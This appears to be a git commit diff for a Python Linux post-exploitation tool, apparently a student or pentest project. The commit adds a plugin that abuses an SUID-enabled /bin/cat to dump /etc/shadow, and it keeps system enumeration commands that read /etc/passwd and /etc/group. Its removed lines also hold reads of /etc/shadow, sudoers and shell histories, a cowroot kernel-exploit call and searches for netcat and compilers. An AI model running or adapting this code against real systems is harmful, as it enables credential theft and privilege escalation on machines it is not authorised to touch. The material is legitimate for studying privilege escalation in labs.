Added plugins

alhendio · Nov 26, 2020 · bc75b89bbfd7e4a8c39cc41cf0dd1c13c2e4964f · bc75b89
1 parent a3d177d
commit bc75b89bbfd7e4a8c39cc41cf0dd1c13c2e4964f
Show file tree

Hide file tree

Showing 3 changed files with 47 additions and 122 deletions.
diff --git a/src/__pycache__/omar_plugins.cpython-36.pyc b/src/__pycache__/omar_plugins.cpython-36.pyc
diff --git a/src/leap.py b/src/leap.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python3
 
-from omar_plugins import DumbSudoEscalation    
+from omar_plugins import linCatEscalator    
 from omar_plugins import HostInfo 
 from omar_plugins import NetInfo 
 from omar_plugins import AppInfo  
@@ -10,7 +10,7 @@ from omar_plugins import AppInfo
 if __name__=="__main__":
     #Make a list of available privescs
     pes=[]
-    pes.append(DumbSudoEscalation("swordfish"))
+    pes.append(linCatEscalator())
     #And enumerations
     ens=[]
     ens.append(HostInfo())

diff --git a/src/omar_plugins.py b/src/omar_plugins.py
@@ -8,6 +8,10 @@ from subprocess import Popen, PIPE
 
 import pty
 
+import subprocess
+
+import pathlib, stat
+
 
 # A very basic method, but useful
 def shellRun(command):
@@ -19,14 +23,11 @@ def shellRun(command):
     os.system(f"chmod u+x {fname}")
     print(f"Execute command with '{fname}'...\nCtrl-D to leave shell")
 
-    os.system("./cowroot")
-    os.unlink("./cowroot")
+
     #pty.spawn("/bin/bash")
     #os.system(fname)
     #os.unlink(fname)
 
-
-class DumbSudoEscalation(PrivEsc):
     """An example plugin that tries to use `sudo su` to get root. 
 
     Requires being given the password for the current user and relies
@@ -35,54 +36,60 @@ class DumbSudoEscalation(PrivEsc):
     right credentials
 
     """
-    def __init__(self, pw):
-        PrivEsc.__init__(self)
-        self.pw=pw
-        self.name="Resetting Password"
+
+        #shellRun("sudo passwd")
+        #shellRun("sudo id")
+        #shellRun("sudo -l")
+
+def GrabOutput(command):
+    sp=subprocess.run(command, stdout=subprocess.PIPE)
+    return sp.stdout.decode()
+
+def CheckBinary(p):
+    pl=pathlib.Path(p)
+    exists=pl.exists()
+    suid=False
+    if exists:
+        suid=(pl.stat().st_mode & stat.S_ISUID)!=0
+    return (exists, suid) 
+
+class linCatEscalator(PrivEsc):
+    def __init__(self):
+        self.name="CatEscalator"
         self.author="Omar Alhendi"
-        self.description="Using sudo to change the passwd"
+        self.description="Showing Restricted file /etc/shadow using misonfigured cat"
+        self.version=""
     def execute(self):
-        print("Executing")
+        catPath= "/bin/cat"
+        exists, suid = CheckBinary(catPath)
+        if not exists:
+            print(f"{catPath} doesn't exist")
+            return
+        if not suid:
+            print(f"cat doesn't have SUID bit set on")
+            return
+        out = GrabOutput([catPath, "/etc/shadow"])
+        print(out)
 
-        #shellRun("sudo passwd")
-        #shellRun("sudo id")
-        shellRun("sudo -l")
-        print("Done")
 
-class HostInfo(Enumeration):
+class LinHostInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="Host Information"
         self.author="Omar ALhendi"
         self.description="Provides basic inforamdtion about the host"
         self.version = "2.0"
     def execute(self):
-        #print()
-        #print("         Hostname: ")
-        #os.system("hostname")
-        #print()
-        #print("        Cureent User: ")
-        #os.system("whoami")
-        #print()
-        #print("        Current Action: ")
-        #os.system("w")
-        #print()
-        #print("           Id Information and Groups: ")
-        #os.system("id")
-        #print()
+        os.system("hostname")
+        os.system("whoami")
         print("             Confidential And Users")
         os.system("id")
         os.system("who")
         os.system("w")
         os.system("last")
-        os.system("cat /etc/passwd | cut -d: -f1")    # List of users
-        os.system("cat /etc/sudoers")
-        os.system("sudo -l")
+        os.system("cat /etc/passwd | cut -d: -f1")
         os.system("ps aux")
         os.system("ps -ef")
-        os.system("top")
-        os.system("cat /etc/services")
-        os.system("cat /proc/version")
         print()
         print("              Kernel Version")
         os.system("uname -a")
@@ -103,30 +110,12 @@ class HostInfo(Enumeration):
         print("               Sensitive Information")
         os.system("cat /etc/passwd")
         os.system("cat /etc/group")
-        os.system("cat /etc/shadow")
-        os.system("ls -alh /var/mail/")
         print()
         print("               Files Privilegs")
         os.system("ls -la")
-        os.system("ls a")
-        print("               History of the User")
-        os.system("cat ~/.bash_history")
-        os.system("cat ~/.nano_history")
-        os.system("cat ~/.atftp_history")
-        os.system("cat ~/.mysql_history")
-        os.system("cat ~/.php_history")
-        print()              
-        #os.system("ls -ahlR /root/")
-        #os.system("ls -ahlR /home/")
-
-        #print("Plain usernames or Passwords")
-        #os.system("grep -i user [filename]")
-        #os.system("grep -i pass [filename]")
-        #os.system("grep -C 5 "password" [filename]")
-        #os.system("find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla")
-
-
-class NetInfo(Enumeration):
+
+
+class LinNetInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="Network Information"
@@ -135,27 +124,10 @@ class NetInfo(Enumeration):
         self.version= "2.0"
     def execute(self):
         print()
-        print("Ip Address: ")
         os.system("ip")
-        print()
-        print("Interface Configurator: ")
         os.system("ifconfig")
-        print()
-        print("Ping: ")
-        #os.system("ping")
-        print()
-        print("Ip Address: ")
-        #os.system("ip a")
-        print()
-        print("Ip Address: ")
-        #os.system("ip")
-        print()
-        print("All the open programs associated with Socket: ")
         os.system("netstat -p")
-        print()
-        print("The display and manipulate of the existing route tables: ")
         os.system("route")
-        print()
         os.system("lsof -i")
         os.system("lsof -i :80")
         os.system("grep 80 /etc/services")
@@ -178,7 +150,7 @@ class NetInfo(Enumeration):
         os.system("chkconfig --list")
 
 
-class AppInfo(Enumeration):
+class LinAppInfo(Enumeration):
     def __init__(self):
         Enumeration.__init__(self)
         self.name="Applications and Services"
@@ -203,52 +175,5 @@ class AppInfo(Enumeration):
         os.system("ls -alh /var/cache/apt/archivesO")
         os.system("ls -alh /var/cache/yum/")
 
-class FilesInfo(Enumeration):
-    def __init__(self):
-        Enumeration.__init__(self)
-        self.name="Files Systems"
-        self.author="Omar ALhendi"
-        self.description="Provides Information about The File systems"
-
-    def execute(self):
-        print()
-        os.system("find /etc/ -readable -type f 2>/dev/null")               # Anyone
-        os.system("find /etc/ -readable -type f -maxdepth 1 2>/dev/null")   # Anyone
-        print("Var Directory files")
-        os.system("ls -alh /var/log")
-        os.system("ls -alh /var/mail")
-        os.system("ls -alh /var/spool")
-        os.system("ls -alh /var/spool/lpd")
-        os.system("ls -alh /var/lib/pgsql")
-        os.system("ls -alh /var/lib/mysql")
-        os.system("cat /var/lib/dhcp3/dhclient.leases")
-        print("Hidden Files")
-        os.system("ls -alhR /var/www/")
-        os.system("ls -alhR /srv/www/htdocs/")
-        os.system("ls -alhR /usr/local/www/apache22/data/")
-        os.system("ls -alhR /opt/lampp/htdocs/")
-        os.system("ls -alhR /var/www/html/")
-        print("Mounted Files")
-        os.system("mount")
-        os.system("df -h")
-        os.system("cat /etc/fstab")
-class PrepInfo(Enumeration):
-    def __init__(self):
-        Enumeration.__init__(self)
-        self.name="Prepartion for exploiting code"
-        self.author="Omar ALhendi"
-        self.description="Information about prepartion and Finding expoliting Code"
-
-    def execute(self):
-        print()
-        os.system("find / -name perl*")
-        os.system("find / -name python*")
-        os.system("find / -name gcc*")
-        os.system("find / -name cc")
-        os.system("find / -name wget")
-        os.system("find / -name nc*")
-        os.system("find / -name netcat*")
-        os.system("find / -name tftp*")
-        os.system("find / -name ftp")